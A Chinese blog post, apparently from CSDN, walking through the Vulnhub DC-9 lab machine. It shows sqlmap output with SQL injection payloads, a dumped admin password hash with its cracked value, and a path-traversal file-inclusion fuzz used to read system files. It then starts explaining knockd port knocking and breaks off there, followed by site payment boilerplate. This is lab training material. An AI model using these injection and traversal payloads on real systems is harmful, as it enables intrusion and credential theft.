【vulnhub】【DC系列】DC9 - Knockd 靶机

本文介绍了在Vulnhub的DC9靶机中,通过信息收集发现了SQL注入和文件包含漏洞。利用knockd程序解锁隐藏端口,成功开启SSH访问。接着通过SSH爆破获取janitor用户,并进行信息收集。最终发现新用户fredf,通过源码分析和写入权限实现权限提升。
摘要由CSDN通过智能技术生成

1、信息收集

使用netdiscover发现靶机 ip:192.168.57.155

使用nmap发现仅开放80端口

1.1、尝试注入

访问页面后,发现search疑似存在SQL注入

使用nmap测试

sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51
785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [3]:
[*] information_schema
[*] Staff
[*] users

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51
785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51
785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column   | Type            |
+----------+-----------------+
| Password | varchar(255)    |
| UserID   | int(6) unsigned |
| Username | varchar(255)    |
+----------+-----------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51
785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51
785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Database: Staff
Table: Users
[1 entry]

# 获取到当前CMS的管理员账号,在线查询后为:transorbital1
+----------+----------------------------------+
| Username | Password                         |
+----------+----------------------------------+
| admin    | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+

cms 用户已获取到,登陆后,发现疑似存在文件包含漏洞

image-20210104143248923

1.2、文件包含fuzz

192.168.57.155/manage.php?a=../../../../..b
# 使用burp对a和b进行变量替换,fuzz发现存在文件包含漏洞,可以读取`passwd`文件,但不能读取`shadow`
# 存在knockd.conf文件

1.3、knockd利用

knockd是一个敲门程序,只有用户按照顺序访问对个端口后,对应对隐藏的端口才会重新开放

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值